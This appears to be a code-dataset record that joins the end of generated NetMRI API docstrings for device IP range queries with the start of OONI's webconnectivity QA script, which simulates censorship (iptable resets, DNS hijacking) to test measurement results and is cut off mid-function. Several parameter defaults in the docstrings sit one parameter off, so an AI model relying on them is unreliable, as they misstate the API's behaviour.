:param val_f_IprIPVersion: If op_IprIPVersion is specified, the field named in this input will be compared to the value in IprIPVersion using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_IprIPVersion must be specified if op_IprIPVersion is specified.
:type val_f_IprIPVersion: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_IprIPVersion: If op_IprIPVersion is specified, this value will be compared to the value in IprIPVersion using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_IprIPVersion must be specified if op_IprIPVersion is specified.
:type val_c_IprIPVersion: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_IprStartTime: The operator to apply to the field IprStartTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. IprStartTime: The starting effective time of this record. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_IprStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_IprStartTime: If op_IprStartTime is specified, the field named in this input will be compared to the value in IprStartTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_IprStartTime must be specified if op_IprStartTime is specified.
:type val_f_IprStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_IprStartTime: If op_IprStartTime is specified, this value will be compared to the value in IprStartTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_IprStartTime must be specified if op_IprStartTime is specified.
:type val_c_IprStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_IprTimestamp: The operator to apply to the field IprTimestamp. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. IprTimestamp: The date and time this record was collected or calculated. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_IprTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_IprTimestamp: If op_IprTimestamp is specified, the field named in this input will be compared to the value in IprTimestamp using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_IprTimestamp must be specified if op_IprTimestamp is specified.
:type val_f_IprTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_IprTimestamp: If op_IprTimestamp is specified, this value will be compared to the value in IprTimestamp using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_IprTimestamp must be specified if op_IprTimestamp is specified.
:type val_c_IprTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the device ip ranges as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of device ip range methods. The listed methods will be called on each device ip range returned and included in the output. Available methods are: device_object, data_source, device.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: device_object, data_source, device.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` DeviceIPRangeID
:param sort: The data field(s) to use for sorting the output. Default is DeviceIPRangeID. Valid values are DeviceIPRangeID, DeviceID, DeviceObjectID, DataSourceID, IprFirstSeenTime, IprStartTime, IprEndTime, IprTimestamp, IprChangedCols, IprIPVersion, IprDisplayText, IprIPNumericMin, IprIPNumericMax.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each DeviceIpRange. Valid values are DeviceIPRangeID, DeviceID, DeviceObjectID, DataSourceID, IprFirstSeenTime, IprStartTime, IprEndTime, IprTimestamp, IprChangedCols, IprIPVersion, IprDisplayText, IprIPNumericMin, IprIPNumericMax. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Remind that this kind of filter may be costly and inefficient if not associated with a database filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return device_ip_ranges: An array of the DeviceIpRange objects that match the specified input criteria.
:rtype device_ip_ranges: Array of DeviceIpRange
"""
return self.api_list_request(self._get_method_fullname("find"), kwargs)
def device_object(self, **kwargs):
"""the network object to which belongs this ip address range.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceIPRangeID: The internal NetMRI identifier for ip address range definition.
:type DeviceIPRangeID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : the network object to which belongs this ip address range.
:rtype : DeviceObject
"""
return self.api_request(self._get_method_fullname("device_object"), kwargs)
def data_source(self, **kwargs):
"""The collector NetMRI that collected this data record.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceIPRangeID: The internal NetMRI identifier for ip address range definition.
:type DeviceIPRangeID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The collector NetMRI that collected this data record.
:rtype : DataSource
"""
return self.api_request(self._get_method_fullname("data_source"), kwargs)
def device(self, **kwargs):
"""The device from which this data was collected.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceIPRangeID: The internal NetMRI identifier for ip address range definition.
:type DeviceIPRangeID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The device from which this data was collected.
:rtype : Device
"""
return self.api_request(self._get_method_fullname("device"), kwargs)
| 53.908197 | 608 | 0.617301 | 6,004 | 49,326 | 5.017821 | 0.049467 | 0.069041 | 0.044877 | 0.058685 | 0.935838 | 0.934975 | 0.908853 | 0.89677 | 0.884389 | 0.875095 | 0 | 0.003339 | 0.301727 | 49,326 | 914 | 609 | 53.967177 | 0.871353 | 0.822406 | 0 | 0 | 0 | 0 | 0.06701 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.411765 | false | 0 | 0.058824 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 9 |
a3d84039bec9d6bdec319d143db077233b621947 | 32,114 | py | Python | QA/webconnectivity.py | roopakv/probe-cli | a8e5ac470963e95063832d6a48d9e9fbfd82ed79 | [
"BSD-3-Clause"
] | 46 | 2019-05-31T08:06:44.000Z | 2021-02-23T01:48:17.000Z | QA/webconnectivity.py | roopakv/probe-cli | a8e5ac470963e95063832d6a48d9e9fbfd82ed79 | [
"BSD-3-Clause"
] | 674 | 2019-05-21T09:40:03.000Z | 2021-06-11T08:59:24.000Z | QA/webconnectivity.py | roopakv/probe-cli | a8e5ac470963e95063832d6a48d9e9fbfd82ed79 | [
"BSD-3-Clause"
] | 18 | 2019-07-22T19:16:16.000Z | 2021-10-09T20:14:12.000Z | #!/usr/bin/env python3
""" ./QA/webconnectivity.py - main QA script for webconnectivity
This script performs a bunch of webconnectivity tests under censored
network conditions and verifies that the measurement is consistent
with the expectations, by parsing the resulting JSONL. """
import contextlib
import json
import os
import shlex
import socket
import subprocess
import sys
import time
import urllib.parse
sys.path.insert(0, ".")
import common
def execute_jafar_and_return_validated_test_keys(
ooni_exe, outfile, experiment_args, tag, args
):
""" Executes jafar and returns the validated parsed test keys, or throws
an AssertionError if the result is not valid. """
tk = common.execute_jafar_and_miniooni(
ooni_exe, outfile, experiment_args, tag, args
)
return tk
def assert_status_flags_are(ooni_exe, tk, desired):
""" Checks whether the status flags are what we expect them to
be when we're running miniooni. This check only makes sense
with miniooni b/c status flags are a miniooni extension. """
if "miniooni" not in ooni_exe:
return
assert tk["x_status"] == desired
def webconnectivity_https_ok_with_control_failure(ooni_exe, outfile):
""" Successful HTTPS measurement but control failure. """
args = [
"-iptables-reset-keyword",
"wcth.ooni.io",
]
tk = execute_jafar_and_return_validated_test_keys(
ooni_exe,
outfile,
"-i https://example.com/ web_connectivity",
"webconnectivity_https_ok_with_control_failure",
args,
)
assert tk["dns_experiment_failure"] == None
assert tk["dns_consistency"] == None
assert tk["control_failure"] == "connection_reset"
assert tk["http_experiment_failure"] == None
assert tk["body_length_match"] == None
assert tk["body_proportion"] == 0
assert tk["status_code_match"] == None
assert tk["headers_match"] == None
assert tk["title_match"] == None
if "miniooni" in ooni_exe:
assert tk["blocking"] == False
assert tk["accessible"] == True
else:
assert tk["blocking"] == None
assert tk["accessible"] == None
assert_status_flags_are(ooni_exe, tk, 1)
def webconnectivity_http_ok_with_control_failure(ooni_exe, outfile):
""" Successful HTTP measurement but control failure. """
args = [
"-iptables-reset-keyword",
"wcth.ooni.io",
]
tk = execute_jafar_and_return_validated_test_keys(
ooni_exe,
outfile,
"-i http://example.org/ web_connectivity",
"webconnectivity_http_ok_with_control_failure",
args,
)
assert tk["dns_experiment_failure"] == None
assert tk["dns_consistency"] == None
assert tk["control_failure"] == "connection_reset"
assert tk["http_experiment_failure"] == None
assert tk["body_length_match"] == None
assert tk["body_proportion"] == 0
assert tk["status_code_match"] == None
assert tk["headers_match"] == None
assert tk["title_match"] == None
assert tk["blocking"] == None
assert tk["accessible"] == None
assert_status_flags_are(ooni_exe, tk, 8)
def webconnectivity_transparent_http_proxy(ooni_exe, outfile):
""" Test case where we pass through a transparent HTTP proxy """
args = []
args.append("-iptables-hijack-https-to")
args.append("127.0.0.1:443")
tk = execute_jafar_and_return_validated_test_keys(
ooni_exe,
outfile,
"-i https://example.org web_connectivity",
"webconnectivity_transparent_http_proxy",
args,
)
assert tk["dns_experiment_failure"] == None
assert tk["dns_consistency"] == "consistent"
assert tk["control_failure"] == None
assert tk["http_experiment_failure"] == None
assert tk["body_length_match"] == True
assert tk["body_proportion"] == 1
assert tk["status_code_match"] == True
assert tk["headers_match"] == True
assert tk["title_match"] == True
assert tk["blocking"] == False
assert tk["accessible"] == True
assert_status_flags_are(ooni_exe, tk, 1)
def webconnectivity_dns_hijacking(ooni_exe, outfile):
""" Test case where there is DNS hijacking towards a transparent proxy. """
args = []
args.append("-iptables-hijack-dns-to")
args.append("127.0.0.1:53")
args.append("-dns-proxy-hijack")
args.append("example.org")
tk = execute_jafar_and_return_validated_test_keys(
ooni_exe,
outfile,
"-i https://example.org web_connectivity",
"webconnectivity_dns_hijacking",
args,
)
assert tk["dns_experiment_failure"] == None
assert tk["dns_consistency"] == "inconsistent"
assert tk["control_failure"] == None
assert tk["http_experiment_failure"] == None
assert tk["body_length_match"] == True
assert tk["body_proportion"] == 1
assert tk["status_code_match"] == True
assert tk["headers_match"] == True
assert tk["title_match"] == True
assert tk["blocking"] == False
assert tk["accessible"] == True
assert_status_flags_are(ooni_exe, tk, 1)
def webconnectivity_control_unreachable_and_using_http(ooni_exe, outfile):
""" Test case where the control is unreachable and we're using the
plaintext HTTP protocol rather than HTTPS """
args = []
args.append("-iptables-reset-keyword")
args.append("wcth.ooni.io")
tk = execute_jafar_and_return_validated_test_keys(
ooni_exe,
outfile,
"-i http://example.org web_connectivity",
"webconnectivity_control_unreachable_and_using_http",
args,
)
assert tk["dns_experiment_failure"] == None
assert tk["dns_consistency"] == None
assert tk["control_failure"] == "connection_reset"
assert tk["http_experiment_failure"] == None
assert tk["body_length_match"] == None
assert tk["body_proportion"] == 0
assert tk["status_code_match"] == None
assert tk["headers_match"] == None
assert tk["title_match"] == None
assert tk["blocking"] == None
assert tk["accessible"] == None
assert_status_flags_are(ooni_exe, tk, 8)
def webconnectivity_nonexistent_domain(ooni_exe, outfile):
""" Test case where the domain does not exist """
args = []
tk = execute_jafar_and_return_validated_test_keys(
ooni_exe,
outfile,
"-i http://antani.ooni.io web_connectivity",
"webconnectivity_nonexistent_domain",
args,
)
# TODO(bassosimone): Debateable result. We need to do better here.
# See <https://github.com/ooni/probe-engine/issues/579>.
#
# Note that MK is not doing it right here because it's suppressing the
# dns_nxdomain_error that instead is very informative. Yet, it is reporting
# a failure in HTTP, which miniooni does not because it does not make
# sense to perform HTTP when there are no IP addresses.
#
# The following seems indeed a bug in MK where we don't properly record the
# actual error that occurred when performing the DNS experiment.
#
# See <https://github.com/measurement-kit/measurement-kit/issues/1931>.
if "miniooni" in ooni_exe:
assert tk["dns_experiment_failure"] == "dns_nxdomain_error"
else:
assert tk["dns_experiment_failure"] == None
assert tk["dns_consistency"] == "consistent"
assert tk["control_failure"] == None
if "miniooni" in ooni_exe:
assert tk["http_experiment_failure"] == None
else:
assert tk["http_experiment_failure"] == "dns_lookup_error"
assert tk["body_length_match"] == None
assert tk["body_proportion"] == 0
assert tk["status_code_match"] == None
assert tk["headers_match"] == None
assert tk["title_match"] == None
assert tk["blocking"] == False
assert tk["accessible"] == True
assert_status_flags_are(ooni_exe, tk, 2052)
def webconnectivity_tcpip_blocking_with_consistent_dns(ooni_exe, outfile):
""" Test case where there's TCP/IP blocking w/ consistent DNS """
ip = socket.gethostbyname("nexa.polito.it")
args = [
"-iptables-drop-ip",
ip,
]
tk = execute_jafar_and_return_validated_test_keys(
ooni_exe,
outfile,
"-i http://nexa.polito.it web_connectivity",
"webconnectivity_tcpip_blocking_with_consistent_dns",
args,
)
assert tk["dns_experiment_failure"] == None
assert tk["dns_consistency"] == "consistent"
assert tk["control_failure"] == None
assert tk["http_experiment_failure"] == "generic_timeout_error"
assert tk["body_length_match"] == None
assert tk["body_proportion"] == 0
assert tk["status_code_match"] == None
assert tk["headers_match"] == None
assert tk["title_match"] == None
assert tk["blocking"] == "tcp_ip"
assert tk["accessible"] == False
assert_status_flags_are(ooni_exe, tk, 4224)
def webconnectivity_tcpip_blocking_with_inconsistent_dns(ooni_exe, outfile):
""" Test case where there's TCP/IP blocking w/ inconsistent DNS """
def runner(port):
args = [
"-dns-proxy-hijack",
"nexa.polito.it",
"-iptables-hijack-dns-to",
"127.0.0.1:53",
"-iptables-hijack-http-to",
"127.0.0.1:{}".format(port),
]
tk = execute_jafar_and_return_validated_test_keys(
ooni_exe,
outfile,
"-i http://nexa.polito.it web_connectivity",
"webconnectivity_tcpip_blocking_with_inconsistent_dns",
args,
)
assert tk["dns_experiment_failure"] == None
assert tk["dns_consistency"] == "inconsistent"
assert tk["control_failure"] == None
assert tk["http_experiment_failure"] == "connection_refused"
assert tk["body_length_match"] == None
assert tk["body_proportion"] == 0
assert tk["status_code_match"] == None
assert tk["headers_match"] == None
assert tk["title_match"] == None
assert tk["blocking"] == "dns"
assert tk["accessible"] == False
assert_status_flags_are(ooni_exe, tk, 4256)
common.with_free_port(runner)
def webconnectivity_http_connection_refused_with_consistent_dns(ooni_exe, outfile):
""" Test case where there's TCP/IP blocking w/ consistent DNS that occurs
while we're following the chain of redirects. """
# We use a bit.ly link redirecting to nexa.polito.it. We block the IP address
# used by nexa.polito.it. So the error should happen in the redirect chain.
ip = socket.gethostbyname("nexa.polito.it")
args = [
"-iptables-reset-ip",
ip,
]
tk = execute_jafar_and_return_validated_test_keys(
ooni_exe,
outfile,
"-i https://bit.ly/3h9EJR3 web_connectivity",
"webconnectivity_http_connection_refused_with_consistent_dns",
args,
)
assert tk["dns_experiment_failure"] == None
assert tk["dns_consistency"] == "consistent"
assert tk["control_failure"] == None
assert tk["http_experiment_failure"] == "connection_refused"
assert tk["body_length_match"] == None
assert tk["body_proportion"] == 0
assert tk["status_code_match"] == None
assert tk["headers_match"] == None
assert tk["title_match"] == None
assert tk["blocking"] == "http-failure"
assert tk["accessible"] == False
assert_status_flags_are(ooni_exe, tk, 8320)
def webconnectivity_http_connection_reset_with_consistent_dns(ooni_exe, outfile):
""" Test case where there's RST-based blocking blocking w/ consistent DNS that
occurs while we're following the chain of redirects. """
# We use a bit.ly link redirecting to nexa.polito.it. We block the Host header
# used for nexa.polito.it. So the error should happen in the redirect chain.
args = [
"-iptables-reset-keyword",
"Host: nexa",
]
tk = execute_jafar_and_return_validated_test_keys(
ooni_exe,
outfile,
"-i https://bit.ly/3h9EJR3 web_connectivity",
"webconnectivity_http_connection_reset_with_consistent_dns",
args,
)
assert tk["dns_experiment_failure"] == None
assert tk["dns_consistency"] == "consistent"
assert tk["control_failure"] == None
assert tk["http_experiment_failure"] == "connection_reset"
assert tk["body_length_match"] == None
assert tk["body_proportion"] == 0
assert tk["status_code_match"] == None
assert tk["headers_match"] == None
assert tk["title_match"] == None
assert tk["blocking"] == "http-failure"
assert tk["accessible"] == False
assert_status_flags_are(ooni_exe, tk, 8448)
def webconnectivity_http_nxdomain_with_consistent_dns(ooni_exe, outfile):
""" Test case where there's a redirection and the redirected request cannot
continue because a NXDOMAIN error occurs. """
# We use a bit.ly link redirecting to nexa.polito.it. We block the DNS request
# for nexa.polito.it. So the error should happen in the redirect chain.
args = [
"-iptables-hijack-dns-to",
"127.0.0.1:53",
"-dns-proxy-block",
"nexa.polito.it",
]
tk = execute_jafar_and_return_validated_test_keys(
ooni_exe,
outfile,
"-i https://bit.ly/3h9EJR3 web_connectivity",
"webconnectivity_http_nxdomain_with_consistent_dns",
args,
)
assert tk["dns_experiment_failure"] == None
assert tk["dns_consistency"] == "consistent"
assert tk["control_failure"] == None
assert (
tk["http_experiment_failure"] == "dns_nxdomain_error" # miniooni
or tk["http_experiment_failure"] == "dns_lookup_error" # MK
)
assert tk["body_length_match"] == None
assert tk["body_proportion"] == 0
assert tk["status_code_match"] == None
assert tk["headers_match"] == None
assert tk["title_match"] == None
assert tk["blocking"] == "dns"
assert tk["accessible"] == False
assert_status_flags_are(ooni_exe, tk, 8224)
def webconnectivity_http_eof_error_with_consistent_dns(ooni_exe, outfile):
""" Test case where there's a redirection and the redirected request cannot
continue because an eof_error error occurs. """
# We use a bit.ly link redirecting to nexa.polito.it. We block the HTTP request
# for nexa.polito.it using the cleartext bad proxy. So the error should happen in
# the redirect chain and should be EOF.
args = [
"-iptables-hijack-dns-to",
"127.0.0.1:53",
"-dns-proxy-hijack",
"nexa.polito.it",
"-iptables-hijack-http-to",
"127.0.0.1:7117", # this is badproxy's cleartext endpoint
]
tk = execute_jafar_and_return_validated_test_keys(
ooni_exe,
outfile,
"-i https://bit.ly/3h9EJR3 web_connectivity", # bit.ly uses https
"webconnectivity_http_eof_error_with_consistent_dns",
args,
)
assert tk["dns_experiment_failure"] == None
assert tk["dns_consistency"] == "consistent"
assert tk["control_failure"] == None
assert tk["http_experiment_failure"] == "eof_error"
assert tk["body_length_match"] == None
assert tk["body_proportion"] == 0
assert tk["status_code_match"] == None
assert tk["headers_match"] == None
assert tk["title_match"] == None
assert tk["blocking"] == "http-failure"
assert tk["accessible"] == False
assert_status_flags_are(ooni_exe, tk, 8448)
def webconnectivity_http_generic_timeout_error_with_consistent_dns(ooni_exe, outfile):
""" Test case where there's a redirection and the redirected request cannot
continue because a generic_timeout_error error occurs. """
# We use a bit.ly link redirecting to nexa.polito.it. We block the HTTP request
# for nexa.polito.it by dropping packets using DPI. So the error should happen in
# the redirect chain and should be timeout.
args = [
"-iptables-hijack-dns-to",
"127.0.0.1:53",
"-dns-proxy-hijack",
"nexa.polito.it",
"-iptables-drop-keyword",
"Host: nexa",
]
tk = execute_jafar_and_return_validated_test_keys(
ooni_exe,
outfile,
"-i https://bit.ly/3h9EJR3 web_connectivity",
"webconnectivity_http_generic_timeout_error_with_consistent_dns",
args,
)
assert tk["dns_experiment_failure"] == None
assert tk["dns_consistency"] == "consistent"
assert tk["control_failure"] == None
assert tk["http_experiment_failure"] == "generic_timeout_error"
assert tk["body_length_match"] == None
assert tk["body_proportion"] == 0
assert tk["status_code_match"] == None
assert tk["headers_match"] == None
assert tk["title_match"] == None
assert tk["blocking"] == "http-failure"
assert tk["accessible"] == False
assert_status_flags_are(ooni_exe, tk, 8704)
def webconnectivity_http_connection_reset_with_inconsistent_dns(ooni_exe, outfile):
""" Test case where there's inconsistent DNS and the connection is RST when
we're executing HTTP code. """
args = [
"-iptables-reset-keyword",
"nexa.polito.it",
"-iptables-hijack-dns-to",
"127.0.0.1:53",
"-dns-proxy-hijack",
"polito",
]
tk = execute_jafar_and_return_validated_test_keys(
ooni_exe,
outfile,
"-i http://nexa.polito.it/ web_connectivity",
"webconnectivity_http_connection_reset_with_inconsistent_dns",
args,
)
assert tk["dns_experiment_failure"] == None
assert tk["dns_consistency"] == "inconsistent"
assert tk["control_failure"] == None
assert tk["http_experiment_failure"] == "connection_reset"
assert tk["body_length_match"] == None
assert tk["body_proportion"] == 0
assert tk["status_code_match"] == None
assert tk["headers_match"] == None
assert tk["title_match"] == None
assert tk["blocking"] == "dns"
assert tk["accessible"] == False
assert_status_flags_are(ooni_exe, tk, 8480)
def webconnectivity_http_successful_website(ooni_exe, outfile):
""" Test case where we succeed with an HTTP only webpage """
args = []
tk = execute_jafar_and_return_validated_test_keys(
ooni_exe,
outfile,
"-i http://example.org/ web_connectivity",
"webconnectivity_http_successful_website",
args,
)
assert tk["dns_experiment_failure"] == None
assert tk["dns_consistency"] == "consistent"
assert tk["control_failure"] == None
assert tk["http_experiment_failure"] == None
assert tk["body_length_match"] == True
assert tk["body_proportion"] == 1
assert tk["status_code_match"] == True
assert tk["headers_match"] == True
assert tk["title_match"] == True
assert tk["blocking"] == False
assert tk["accessible"] == True
assert_status_flags_are(ooni_exe, tk, 2)
def webconnectivity_https_successful_website(ooni_exe, outfile):
""" Test case where we succeed with an HTTPS only webpage """
args = []
tk = execute_jafar_and_return_validated_test_keys(
ooni_exe,
outfile,
"-i https://example.com/ web_connectivity",
"webconnectivity_https_successful_website",
args,
)
assert tk["dns_experiment_failure"] == None
assert tk["dns_consistency"] == "consistent"
assert tk["control_failure"] == None
assert tk["http_experiment_failure"] == None
assert tk["body_length_match"] == True
assert tk["body_proportion"] == 1
assert tk["status_code_match"] == True
assert tk["headers_match"] == True
assert tk["title_match"] == True
assert tk["blocking"] == False
assert tk["accessible"] == True
assert_status_flags_are(ooni_exe, tk, 1)
def webconnectivity_http_diff_with_inconsistent_dns(ooni_exe, outfile):
""" Test case where we get an http-diff and the DNS is inconsistent """
args = [
"-iptables-hijack-dns-to",
"127.0.0.1:53",
"-dns-proxy-hijack",
"example.org",
"-http-proxy-block",
"example.org",
]
tk = execute_jafar_and_return_validated_test_keys(
ooni_exe,
outfile,
"-i http://example.org/ web_connectivity",
"webconnectivity_http_diff_with_inconsistent_dns",
args,
)
assert tk["dns_experiment_failure"] == None
assert tk["dns_consistency"] == "inconsistent"
assert tk["control_failure"] == None
assert tk["http_experiment_failure"] == None
assert tk["body_length_match"] == False
assert tk["body_proportion"] < 1
assert tk["status_code_match"] == False
assert tk["headers_match"] == False
assert tk["title_match"] == False
assert tk["blocking"] == "dns"
assert tk["accessible"] == False
assert_status_flags_are(ooni_exe, tk, 96)
def webconnectivity_http_diff_with_consistent_dns(ooni_exe, outfile):
""" Test case where we get an http-diff and the DNS is consistent """
args = [
"-iptables-hijack-http-to",
"127.0.0.1:80",
"-http-proxy-block",
"example.org",
]
tk = execute_jafar_and_return_validated_test_keys(
ooni_exe,
outfile,
"-i http://example.org/ web_connectivity",
"webconnectivity_http_diff_with_consistent_dns",
args,
)
assert tk["dns_experiment_failure"] == None
assert tk["dns_consistency"] == "consistent"
assert tk["control_failure"] == None
assert tk["http_experiment_failure"] == None
assert tk["body_length_match"] == False
assert tk["body_proportion"] < 1
assert tk["status_code_match"] == False
assert tk["headers_match"] == False
assert tk["title_match"] == False
assert tk["blocking"] == "http-diff"
assert tk["accessible"] == False
assert_status_flags_are(ooni_exe, tk, 64)
def webconnectivity_https_expired_certificate(ooni_exe, outfile):
""" Test case where the domain's certificate is expired """
args = []
tk = execute_jafar_and_return_validated_test_keys(
ooni_exe,
outfile,
"-i https://expired.badssl.com/ web_connectivity",
"webconnectivity_https_expired_certificate",
args,
)
assert tk["dns_experiment_failure"] == None
assert tk["dns_consistency"] == "consistent"
assert tk["control_failure"] == None
if "miniooni" in ooni_exe:
assert tk["http_experiment_failure"] == "ssl_invalid_certificate"
else:
assert "certificate verify failed" in tk["http_experiment_failure"]
assert tk["body_length_match"] == None
assert tk["body_proportion"] == 0
assert tk["status_code_match"] == None
assert tk["headers_match"] == None
assert tk["title_match"] == None
# The following strikes me as a measurement_kit bug. We are saying
# that all is good with a domain where actually we don't know why the
# control is failed and that is clearly not accessible according to
# our measurement of the domain (certificate expired).
#
# See <https://github.com/ooni/probe-engine/issues/858>.
if "miniooni" in ooni_exe:
assert tk["blocking"] == None
assert tk["accessible"] == None
else:
assert tk["blocking"] == False
assert tk["accessible"] == True
assert_status_flags_are(ooni_exe, tk, 16)
def webconnectivity_https_wrong_host(ooni_exe, outfile):
""" Test case where the hostname is wrong for the certificate """
args = []
tk = execute_jafar_and_return_validated_test_keys(
ooni_exe,
outfile,
"-i https://wrong.host.badssl.com/ web_connectivity",
"webconnectivity_https_wrong_host",
args,
)
assert tk["dns_experiment_failure"] == None
assert tk["dns_consistency"] == "consistent"
assert tk["control_failure"] == None
if "miniooni" in ooni_exe:
assert tk["http_experiment_failure"] == "ssl_invalid_hostname"
else:
assert "certificate verify failed" in tk["http_experiment_failure"]
assert tk["body_length_match"] == None
assert tk["body_proportion"] == 0
assert tk["status_code_match"] == None
assert tk["headers_match"] == None
assert tk["title_match"] == None
# The following strikes me as a measurement_kit bug. We are saying
# that all is good with a domain where actually we don't know why the
# control is failed and that is clearly not accessible according to
# our measurement of the domain (wrong host for certificate).
#
# See <https://github.com/ooni/probe-engine/issues/858>.
if "miniooni" in ooni_exe:
assert tk["blocking"] == None
assert tk["accessible"] == None
else:
assert tk["blocking"] == False
assert tk["accessible"] == True
assert_status_flags_are(ooni_exe, tk, 16)
def webconnectivity_https_self_signed(ooni_exe, outfile):
""" Test case where the certificate is self signed """
args = []
tk = execute_jafar_and_return_validated_test_keys(
ooni_exe,
outfile,
"-i https://self-signed.badssl.com/ web_connectivity",
"webconnectivity_https_self_signed",
args,
)
assert tk["dns_experiment_failure"] == None
assert tk["dns_consistency"] == "consistent"
assert tk["control_failure"] == None
if "miniooni" in ooni_exe:
assert tk["http_experiment_failure"] == "ssl_unknown_authority"
else:
assert "certificate verify failed" in tk["http_experiment_failure"]
assert tk["body_length_match"] == None
assert tk["body_proportion"] == 0
assert tk["status_code_match"] == None
assert tk["headers_match"] == None
assert tk["title_match"] == None
# The following strikes me as a measurement_kit bug. We are saying
# that all is good with a domain where actually we don't know why the
# control is failed and that is clearly not accessible according to
# our measurement of the domain (self signed certificate).
#
# See <https://github.com/ooni/probe-engine/issues/858>.
if "miniooni" in ooni_exe:
assert tk["blocking"] == None
assert tk["accessible"] == None
else:
assert tk["blocking"] == False
assert tk["accessible"] == True
assert_status_flags_are(ooni_exe, tk, 16)
def webconnectivity_https_untrusted_root(ooni_exe, outfile):
""" Test case where the certificate has an untrusted root """
args = []
tk = execute_jafar_and_return_validated_test_keys(
ooni_exe,
outfile,
"-i https://untrusted-root.badssl.com/ web_connectivity",
"webconnectivity_https_untrusted_root",
args,
)
assert tk["dns_experiment_failure"] == None
assert tk["dns_consistency"] == "consistent"
assert tk["control_failure"] == None
if "miniooni" in ooni_exe:
assert tk["http_experiment_failure"] == "ssl_unknown_authority"
else:
assert "certificate verify failed" in tk["http_experiment_failure"]
assert tk["body_length_match"] == None
assert tk["body_proportion"] == 0
assert tk["status_code_match"] == None
assert tk["headers_match"] == None
assert tk["title_match"] == None
# The following strikes me as a measurement_kit bug. We are saying
# that all is good with a domain where actually we don't know why the
# control is failed and that is clearly not accessible according to
# our measurement of the domain (untrusted root certificate).
#
# See <https://github.com/ooni/probe-engine/issues/858>.
if "miniooni" in ooni_exe:
assert tk["blocking"] == None
assert tk["accessible"] == None
else:
assert tk["blocking"] == False
assert tk["accessible"] == True
assert_status_flags_are(ooni_exe, tk, 16)
def webconnectivity_dns_blocking_nxdomain(ooni_exe, outfile):
""" Test case where there is blocking using NXDOMAIN """
args = [
"-iptables-hijack-dns-to",
"127.0.0.1:53",
"-dns-proxy-block",
"example.com",
]
